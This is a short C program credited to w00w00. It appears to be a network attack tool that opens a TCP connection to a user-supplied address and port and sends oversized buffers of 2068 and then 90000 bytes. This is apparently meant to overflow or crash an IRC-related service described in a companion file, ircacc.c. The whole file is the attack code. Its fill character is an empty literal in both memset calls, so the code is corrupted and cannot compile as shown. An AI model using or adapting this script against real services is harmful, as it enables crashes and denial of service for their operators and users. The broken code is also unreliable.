/* See comments in ircacc.c. w00w00! */

#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <netdb.h>
#include <unistd.h>

#define ERROR  -1
#define SUCCESS 0

void main(int argc, char **argv) 
{
  char *buf;

  int sockfd;
  unsigned tt;

  struct sockaddr_in soc;


  if(argc < 3)
  {
    fprintf(stderr, "Usage: %s <unsigned long addr> <int port>\n", argv[0]);
    exit(ERROR);
  }

  sscanf(argv[1], "%ul", &tt);
	
  soc.sin_family = AF_INET;
  soc.sin_port   = htons(atoi(argv[2]));
  soc.sin_addr.s_addr = htonl(tt);

  sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  if(sockfd == ERROR)
  {
    perror("socket");
    exit(ERROR);
  }

  printf("connecting...");
  if(connect(sockfd, (struct sockaddr *) &soc, sizeof(soc)) == ERROR)
  {
    perror("connect()");
    exit(ERROR);
  }

  printf("connected...sending data...");
  buf = malloc(2068+1);
  if (buf == NULL)
  {
    perror("malloc");
    exit(ERROR);
  }

  memset(buf, '', 2068);
  buf[2068] = '\0';
  if (write(sockfd, buf, strlen(buf)) == ERROR)
  {
    perror("write");
    exit(ERROR);
  }

  if (write(sockfd, "\n", 1) == ERROR)
  {
    perror("write");
    exit(ERROR);
  }

  free(buf);		

  buf = malloc(90000+1);
  if (buf == NULL)
  {
    perror("malloc");
    exit(ERROR);
  }

  memset(buf, '', 90000);
  buf[90000] = '\0';

  if(write(sockfd, buf, strlen(buf)) == ERROR)
  {
    perror("write");
    exit(ERROR);
  }

  if(write(sockfd, "\n", 1) == ERROR)
  {
    perror("write");
    exit(ERROR);
  }

  free(buf);

  shutdown(sockfd, 2);
  printf("connection terminated.\n");

  exit(SUCCESS);
}
